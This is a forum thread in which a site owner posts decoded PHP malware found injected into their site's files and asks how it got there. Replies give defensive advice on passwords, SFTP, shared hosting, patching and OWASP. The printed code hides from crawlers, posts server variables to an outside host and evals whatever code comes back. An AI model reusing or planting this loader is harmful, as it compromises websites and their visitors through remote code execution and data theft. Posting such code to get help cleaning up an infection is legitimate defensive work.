i decoded the bad code from an online decoding source. it is as follows :
maybe it helps for answering my questions above better.
I wonder if there may be any other file at the server that puts this bad code to our php files., if yes how can i find it ?
the site is a big site.
Thanks

decoded codes :

error_reporting(0);
if(!$hkuh_b) { global $hkuh_b; $hkuh_b = 1;
$bkljg=$_SERVER["HTTP_USER_AGENT"];
$ghfju = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "bot", "spid", "Lynx", "PHP", "WordPress". "integromedb","SISTRIX","Aggregator", "findlinks", "Xenu", "BacklinkCrawler", "Scheduler", "mod_pagespeed", "Index", "ahoo", "Tapatalk", "PubSub", "RSS");
if( !($_GET['df'] === "2") and !($_POST['dl'] === "2" ) and !(@$_COOKIE['statsle']) and ((preg_match("/" . implode("|", $ghfju) . "/i", $bkljg)) or (@$_COOKIE['statsl'])  or (!$bkljg) or ($_SERVER['HTTP_REFERER'] === "http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']) or ($_SERVER['REMOTE_ADDR'] === "127.0.0.1")  or ($_SERVER['REMOTE_ADDR'] === $_SERVER['SERVER_ADDR']) or ($_GET['df'] === "1") or ($_POST['dl'] === "1" )  or (ini_get("safe_mode")) or (!function_exists('file_get_contents')) or (!function_exists('ob_start'))))
{}
else
{
foreach($_SERVER as $ndbv => $cbcd) { $data_nfdh.= "&REM_".$ndbv."='".base64_encode($cbcd)."'";}
$context_jhkb = stream_context_create(
array('http'=>array(
                        'timeout' => '15',
                        'header' => "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.9) Gecko/20100101 Firefox/10.0.9_ Iceweasel/10.0.9\r\nConnection: Close\r\n\r\n",
                        'method' => 'POST',
                        'content' => "REM_REM='1'".$data_nfdh
)));
$vkfu=file_get_contents("http://galeria.banaszek.info/plugins/flvplayer/session.php?id", false ,$context_jhkb);
if($vkfu) { @eval($vkfu); } else {ob_start();  if(!@headers_sent()) { @setcookie("statsl","2",time()+172800); } else { echo "<script>document.cookie='statsl=2; path=/; expires=".date('D, d-M-Y H:i:s',time()+172800)." GMT;';</script>"; } ;};
}
}

The fact that it's base64-encoded PHP code has nothing to do with how it got onto your site, that's just the payload the attacker left once they found a way in. They may have hacked your site login or FTP password (so it's probably time to change all passwords to longer, more difficult to hack passwords, and make sure all access to the site's control panel and FTP (or really SFTP) are via SSL). If you're on a shared hosting plan, it may have come through another hacked account on that same host, or even someone who registered an account there so they could access other accounts' directories on a poorly configured host (so you might want to consider upgrading to a VPS plan, or even move to a different host. There may be a security hole in one of your site's pages that allowed them to drop in a script to modify your PHP files (and then perhaps delete itself), which might require a detailed security analysis to find (and make sure all your 3rd-part apps have the latest security patches!).

The OWASP project provides a lot of material for helping secure web sites, including descriptions of vulnerabilities a site might have and the attacks that exploit them; they also include a 3-yearly assessment of the top ten risks facing current web applications (including a specific section for PHP.

Hey weed, thanks for the links. I've not seen this site before and it shall give me some reading to do.

Thank you for answers and the valuable info you posted. nogdog and weedpacket

ugurpc wrote:

i decoded the bad code from an online decoding source. it is as follows :

Incidentally there was no need to go to an "online decoding source" to decode the base64. The decoding mechanism is built right into PHP and was used by what you posted: [man]base64_decode[/man].